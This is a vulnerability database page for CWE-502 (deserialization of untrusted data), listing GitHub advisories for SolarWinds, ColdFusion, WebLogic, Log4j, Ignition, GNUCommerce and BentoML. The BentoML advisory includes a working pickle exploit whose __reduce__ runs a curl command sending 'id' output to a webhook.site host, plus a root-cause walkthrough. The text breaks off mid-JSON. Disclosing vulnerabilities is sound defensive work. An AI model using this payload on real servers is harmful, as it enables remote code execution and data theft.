CWE-502
AllowedDeserialization of Untrusted Data
Abstraction: Base · Status: Draft
The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
4801 vulnerabilities reference this CWE, most recent first.
GHSA-7QRJ-J83P-3VQG
Vulnerability from github – Published: 2026-01-28 09:30 – Updated: 2026-02-03 21:31SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
{
"affected": [],
"aliases": [
"CVE-2025-40551"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-28T08:16:02Z",
"severity": "CRITICAL"
},
"details": "SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.",
"id": "GHSA-7qrj-j83p-3vqg",
"modified": "2026-02-03T21:31:50Z",
"published": "2026-01-28T09:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40551"
},
{
"type": "WEB",
"url": "https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-40551"
},
{
"type": "WEB",
"url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40551"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7QW7-CWHJ-Q8CG
Vulnerability from github – Published: 2022-05-13 01:17 – Updated: 2022-05-13 01:17Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have a deserialization of untrusted data vulnerability. Successful exploitation could lead to arbitrary code execution.
{
"affected": [],
"aliases": [
"CVE-2018-15957"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-09-25T13:29:00Z",
"severity": "CRITICAL"
},
"details": "Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have a deserialization of untrusted data vulnerability. Successful exploitation could lead to arbitrary code execution.",
"id": "GHSA-7qw7-cwhj-q8cg",
"modified": "2022-05-13T01:17:38Z",
"published": "2022-05-13T01:17:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15957"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/105313"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1041621"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7R67-CRQQ-3693
Vulnerability from github – Published: 2024-07-17 15:30 – Updated: 2024-07-17 15:30It was discovered that a previous vulnerability was not completely fixed with SolarWinds Access Rights Manager. While some controls were implemented the researcher was able to bypass these and use a different method to exploit the vulnerability.
{
"affected": [],
"aliases": [
"CVE-2024-28074"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-17T15:15:13Z",
"severity": "CRITICAL"
},
"details": "It was discovered that a previous vulnerability was not completely fixed with SolarWinds Access Rights Manager. While some controls were implemented the researcher was able to bypass these and use a different method to exploit the vulnerability.",
"id": "GHSA-7r67-crqq-3693",
"modified": "2024-07-17T15:30:51Z",
"published": "2024-07-17T15:30:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28074"
},
{
"type": "WEB",
"url": "https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2024-3_release_notes.htm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7R6V-MXC2-PG49
Vulnerability from github – Published: 2022-05-14 01:14 – Updated: 2025-10-22 00:31The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.
{
"affected": [],
"aliases": [
"CVE-2015-4852"
],
"database_specific": {
"cwe_ids": [
"CWE-502",
"CWE-77"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2015-11-18T15:59:00Z",
"severity": "HIGH"
},
"details": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.",
"id": "GHSA-7r6v-mxc2-pg49",
"modified": "2025-10-22T00:31:11Z",
"published": "2022-05-14T01:14:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-4852"
},
{
"type": "WEB",
"url": "https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852"
},
{
"type": "WEB",
"url": "https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2015-4852"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/42806"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/46628"
},
{
"type": "WEB",
"url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/152268/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2015/11/17/19"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/77539"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038292"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7RJR-3Q55-VV33
Vulnerability from github – Published: 2021-12-14 18:01 – Updated: 2025-10-22 19:12Impact
The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.
Affected packages
Only the org.apache.logging.log4j:log4j-core package is directly affected by this vulnerability. The org.apache.logging.log4j:log4j-api should be kept at the same version as the org.apache.logging.log4j:log4j-core package to ensure compatability if in use.
Mitigation
Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property log4j2.formatMsgNoLookups to true do NOT mitigate this specific vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.logging.log4j:log4j-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.13.0"
},
{
"fixed": "2.16.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.logging.log4j:log4j-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.12.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.ops4j.pax.logging:pax-logging-log4j2"
},
"ranges": [
{
"events": [
{
"introduced": "1.8.0"
},
{
"fixed": "1.9.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.ops4j.pax.logging:pax-logging-log4j2"
},
"ranges": [
{
"events": [
{
"introduced": "1.10.0"
},
{
"fixed": "1.10.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.ops4j.pax.logging:pax-logging-log4j2"
},
"ranges": [
{
"events": [
{
"introduced": "1.11.0"
},
{
"fixed": "1.11.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.ops4j.pax.logging:pax-logging-log4j2"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-45046"
],
"database_specific": {
"cwe_ids": [
"CWE-502",
"CWE-917"
],
"github_reviewed": true,
"github_reviewed_at": "2021-12-14T17:55:00Z",
"nvd_published_at": "2021-12-14T19:15:00Z",
"severity": "CRITICAL"
},
"details": "# Impact\n\nThe fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack. \n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\n# Mitigation\n\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (\u003c 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n\nLog4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability.",
"id": "GHSA-7rjr-3q55-vv33",
"modified": "2025-10-22T19:12:17Z",
"published": "2021-12-14T18:01:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5022"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-45046"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202310-16"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/18/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H",
"type": "CVSS_V3"
}
],
"summary": "Incomplete fix for Apache Log4j vulnerability"
}
GHSA-7RPH-7PWG-4MPV
Vulnerability from github – Published: 2022-07-26 00:00 – Updated: 2022-08-04 00:00This vulnerability allows remote attackers to execute arbitrary code on affected installations of Inductive Automation Ignition 8.1.15 (b2022030114). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ZIP files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-17115.
{
"affected": [],
"aliases": [
"CVE-2022-35872"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-25T19:15:00Z",
"severity": "HIGH"
},
"details": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Inductive Automation Ignition 8.1.15 (b2022030114). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ZIP files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-17115.",
"id": "GHSA-7rph-7pwg-4mpv",
"modified": "2022-08-04T00:00:22Z",
"published": "2022-07-26T00:00:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35872"
},
{
"type": "WEB",
"url": "https://support.inductiveautomation.com/hc/en-us/articles/7625759776653-Regarding-Pwn2Own-2022-Vulnerabilities"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1019"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7V3Q-FC37-V2CJ
Vulnerability from github – Published: 2025-04-15 12:30 – Updated: 2026-04-01 18:34Deserialization of Untrusted Data vulnerability in NotFound GNUCommerce allows Object Injection. This issue affects GNUCommerce: from n/a through 1.5.4.
{
"affected": [],
"aliases": [
"CVE-2025-30985"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-15T12:15:22Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in NotFound GNUCommerce allows Object Injection. This issue affects GNUCommerce: from n/a through 1.5.4.",
"id": "GHSA-7v3q-fc37-v2cj",
"modified": "2026-04-01T18:34:42Z",
"published": "2025-04-15T12:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30985"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/gnucommerce/vulnerability/wordpress-gnucommerce-plugin-1-5-4-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7V4R-C989-XH26
Vulnerability from github – Published: 2025-04-09 12:59 – Updated: 2025-04-23 15:24Summary
There was an insecure deserialization in BentoML's runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server.
PoC
- First, create a file named model.py to create a simple model and save it
import bentoml
import numpy as np
class mymodel:
def predict(self, info):
return np.abs(info)
def __call__(self, info):
return self.predict(info)
model = mymodel()
bentoml.picklable_model.save_model("mymodel", model)
- Then run the following command to save this model
python3 model.py
- Next, create bentofile.yaml to build this model
service: "service.py"
description: "A model serving service with BentoML"
python:
packages:
- bentoml
- numpy
models:
- tag: MyModel:latest
include:
- "*.py"
- Then, create service.py to host this model
import bentoml
from bentoml.io import NumpyNdarray
import numpy as np
model_runner = bentoml.picklable_model.get("mymodel:latest").to_runner()
svc = bentoml.Service("myservice", runners=[model_runner])
async def predict(input_data: np.ndarray):
input_columns = np.split(input_data, input_data.shape[1], axis=1)
result_generator = model_runner.async_run(input_columns, is_stream=True)
async for result in result_generator:
yield result
- Then, run the following commands to build and host this model
bentoml build
bentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888
- Finally, run this below python script to exploit insecure deserialization vulnerability in BentoML's runner server.
import requests
import pickle
url = "http://0.0.0.0:8888/"
headers = {
"args-number": "1",
"Content-Type": "application/vnd.bentoml.pickled",
"Payload-Container": "NdarrayContainer",
"Payload-Meta": '{"format": "default"}',
"Batch-Size": "-1",
}
class P:
def __reduce__(self):
return (__import__('os').system, ('curl -X POST -d "$(id)" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3',))
response = requests.post(url, headers=headers, data=pickle.dumps(P()))
print(response)
And I can replace the NdarrayContainer with PandasDataFrameContainer in Payload-Container header and the exploit still working. After running exploit.py then the output of the command id will be send out to the WebHook server.
Root Cause Analysis:
- When handling a request in BentoML runner server in
src/bentoml/_internal/server/runner_app.py, when the request headerargs-numberis equal to 1, it will call the function_deserialize_single_paramlike the code below:
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298
async def _request_handler(request: Request) -> Response:
assert self._is_ready
arg_num = int(request.headers["args-number"])
r_: bytes = await request.body()
if arg_num == 1:
params: Params[t.Any] = _deserialize_single_param(request, r_)
- Then this is the function of
_deserialize_single_param, which will take the value of all request headers ofPayload-Container,Payload-MetaandBatch-Sizeand the crafted intoPayloadclass which will contain the data fromrequest.body
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393
def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
container = request.headers["Payload-Container"]
meta = json.loads(request.headers["Payload-Meta"])
batch_size = int(request.headers["Batch-Size"])
kwarg_name = request.headers.get("Kwarg-Name")
payload = Payload(
data=bs,
meta=meta,
batch_size=batch_size,
container=container,
)
if kwarg_name:
d = {kwarg_name: payload}
params: Params[t.Any] = Params(**d)
else:
params: Params[t.Any] = Params(payload)
return params
- After crafting
Paramscontaining payload, it will call to functioninferwithparamsvariable as input
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304
try:
payload = await infer(params)
- Inside function
infer, theparamsvariable with is belong to classParamswill call the functionmapof that class withAutoContainer.from_payloadas a parameter.
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289
async def infer(params: Params[t.Any]) -> Payload:
params = params.map(AutoContainer.from_payload)
try:
ret = await runner_method.async_run(
*params.args, **params.kwargs
)
except Exception:
traceback.print_exc()
raise
return AutoContainer.to_payload(ret, 0)
- Inside class
Paramsdefine the functionmapwhich will call theAutoContainer.from_payloadfunction with arguments, which aredata,meta,batch_sizeandcontainer
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66
def map(self, function: t.Callable[[T], To]) -> Params[To]:
"""
Apply a function to all the values in the Params and return a Params of the
return values.
"""
args = tuple(function(a) for a in self.args)
kwargs = {k: function(v) for k, v in self.kwargs.items()}
return Params[To](*args, **kwargs)
- Inside class
AutoContainerclass have defined the functionfrom_payloadwhich will find the class by thepayload.container, which is the value of headerPayload-Container, and it will call the functionfrom_payloadfrom the chosen class as return value
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712
def from_payload(cls, payload: Payload) -> t.Any:
container_cls = DataContainerRegistry.find_by_name(payload.container)
return container_cls.from_payload(payload)
And if the attacker set value of header Payload-Container to NdarrayContainer or PandasDataFrameContainer, it will call from_payload and when it then check if the payload.meta["format"] == "default" it will call pickle.loads(payload.data) and payload.meta["format"] is the value of header Payload-Meta and the attacker can set it to {"format": "default"} and payload.data is the value of request.body which is the payload from malicious class P in my request, which will trigger __reduce__ method and then execute arbitrary commands (for my example is the curl command)
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416
def from_payload(
cls,
payload: Payload,
) -> ext.PdDataFrame:
if payload.meta["format"] == "default":
return pickle.loads(payload.data)
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312
def from_payload(
cls,
payload: Payload,
) -> ext.NpNDArray:
format = payload.meta.get("format", "default")
if format == "default":
return pickle.loads(payload.data)
Impact
In the above Proof of Concept, I have shown how the attacker can execute command id and send the output of the command to the outside. By replacing id command with any OS commands, this insecure deserialization in BentoML's runner server will grant the attacker the permission to gain the remote shell on the server and injecting backdoors to persist access.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "bentoml"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0a1"
},
{
"fixed": "1.4.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-32375"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-09T12:59:45Z",
"nvd_published_at": "2025-04-09T16:15:25Z",
"severity": "CRITICAL"
},
"details": "### Summary\nThere was an insecure deserialization in BentoML\u0027s runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server.\n\n### PoC\n - First, create a file named **model.py** to create a simple model and save it\n```\nimport bentoml\nimport numpy as np\n\nclass mymodel:\n def predict(self, info):\n return np.abs(info)\n def __call__(self, info):\n return self.predict(info)\n\nmodel = mymodel()\nbentoml.picklable_model.save_model(\"mymodel\", model)\n```\n- Then run the following command to save this model\n```\npython3 model.py\n```\n- Next, create **bentofile.yaml** to build this model\n```\nservice: \"service.py\" \ndescription: \"A model serving service with BentoML\" \npython:\n packages:\n - bentoml\n - numpy\nmodels:\n - tag: MyModel:latest \ninclude:\n - \"*.py\" \n```\n- Then, create **service.py** to host this model\n```\nimport bentoml\nfrom bentoml.io import NumpyNdarray\nimport numpy as np\n\n\nmodel_runner = bentoml.picklable_model.get(\"mymodel:latest\").to_runner()\n\nsvc = bentoml.Service(\"myservice\", runners=[model_runner])\n\nasync def predict(input_data: np.ndarray):\n\n input_columns = np.split(input_data, input_data.shape[1], axis=1)\n result_generator = model_runner.async_run(input_columns, is_stream=True)\n async for result in result_generator:\n yield result\n```\n- Then, run the following commands to build and host this model\n```\nbentoml build\nbentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888\n```\n- Finally, run this below python script to exploit insecure deserialization vulnerability in BentoML\u0027s runner server.\n```\nimport requests\nimport pickle\n\nurl = \"http://0.0.0.0:8888/\"\n\nheaders = {\n \"args-number\": \"1\",\n \"Content-Type\": \"application/vnd.bentoml.pickled\",\n \"Payload-Container\": \"NdarrayContainer\", \n \"Payload-Meta\": \u0027{\"format\": \"default\"}\u0027,\n \"Batch-Size\": \"-1\",\n}\n\nclass P:\n def __reduce__(self):\n return (__import__(\u0027os\u0027).system, (\u0027curl -X POST -d \"$(id)\" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3\u0027,))\n\nresponse = requests.post(url, headers=headers, data=pickle.dumps(P()))\n\nprint(response)\n```\nAnd I can replace the **NdarrayContainer** with **PandasDataFrameContainer** in **Payload-Container** header and the exploit still working.\nAfter running **exploit.py** then the output of the command **id** will be send out to the WebHook server.\n\n### Root Cause Analysis:\n\n- When handling a request in BentoML runner server in `src/bentoml/_internal/server/runner_app.py`, when the request header `args-number` is equal to 1, it will call the function `_deserialize_single_param` like the code below:\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298\nasync def _request_handler(request: Request) -\u003e Response:\n assert self._is_ready\n\n arg_num = int(request.headers[\"args-number\"])\n r_: bytes = await request.body()\n\n if arg_num == 1:\n params: Params[t.Any] = _deserialize_single_param(request, r_)\n```\n- Then this is the function of `_deserialize_single_param`, which will take the value of all request headers of `Payload-Container`, `Payload-Meta` and `Batch-Size` and the crafted into `Payload` class which will contain the data from `request.body`\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393\ndef _deserialize_single_param(request: Request, bs: bytes) -\u003e Params[t.Any]:\n container = request.headers[\"Payload-Container\"]\n meta = json.loads(request.headers[\"Payload-Meta\"])\n batch_size = int(request.headers[\"Batch-Size\"])\n kwarg_name = request.headers.get(\"Kwarg-Name\")\n payload = Payload(\n data=bs,\n meta=meta,\n batch_size=batch_size,\n container=container,\n )\n if kwarg_name:\n d = {kwarg_name: payload}\n params: Params[t.Any] = Params(**d)\n else:\n params: Params[t.Any] = Params(payload)\n\n return params\n```\n- After crafting `Params` containing payload, it will call to function `infer` with `params` variable as input\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304\ntry:\n payload = await infer(params)\n```\n- Inside function `infer`, the `params` variable with is belong to class `Params` will call the function `map` of that class with `AutoContainer.from_payload` as a parameter.\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289\nasync def infer(params: Params[t.Any]) -\u003e Payload:\n params = params.map(AutoContainer.from_payload)\n\n try:\n ret = await runner_method.async_run(\n *params.args, **params.kwargs\n )\n except Exception:\n traceback.print_exc()\n raise\n\n return AutoContainer.to_payload(ret, 0)\n```\n- Inside class `Params` define the function `map` which will call the `AutoContainer.from_payload` function with arguments, which are `data`, `meta`, `batch_size` and `container`\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66\ndef map(self, function: t.Callable[[T], To]) -\u003e Params[To]:\n \"\"\"\n Apply a function to all the values in the Params and return a Params of the\n return values.\n \"\"\"\n args = tuple(function(a) for a in self.args)\n kwargs = {k: function(v) for k, v in self.kwargs.items()}\n return Params[To](*args, **kwargs)\n```\n- Inside class `AutoContainer` class have defined the function `from_payload` which will find the class by the `payload.container` , which is the value of header `Payload-Container`, and it will call the function `from_payload` from the chosen class as return value\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712\ndef from_payload(cls, payload: Payload) -\u003e t.Any:\n container_cls = DataContainerRegistry.find_by_name(payload.container)\n return container_cls.from_payload(payload)\n```\nAnd if the attacker set value of header `Payload-Container` to `NdarrayContainer` or `PandasDataFrameContainer`, it will call `from_payload` and when it then check if the `payload.meta[\"format\"] == \"default\"` it will call `pickle.loads(payload.data)` and `payload.meta[\"format\"]` is the value of header `Payload-Meta` and the attacker can set it to `{\"format\": \"default\"}` and `payload.data` is the value of `request.body` which is the payload from malicious `class P` in my request, which will trigger `__reduce__` method and then execute arbitrary commands (for my example is the `curl` command)\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416\ndef from_payload(\n cls,\n payload: Payload,\n) -\u003e ext.PdDataFrame:\n if payload.meta[\"format\"] == \"default\":\n return pickle.loads(payload.data)\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312\ndef from_payload(\n cls,\n payload: Payload,\n) -\u003e 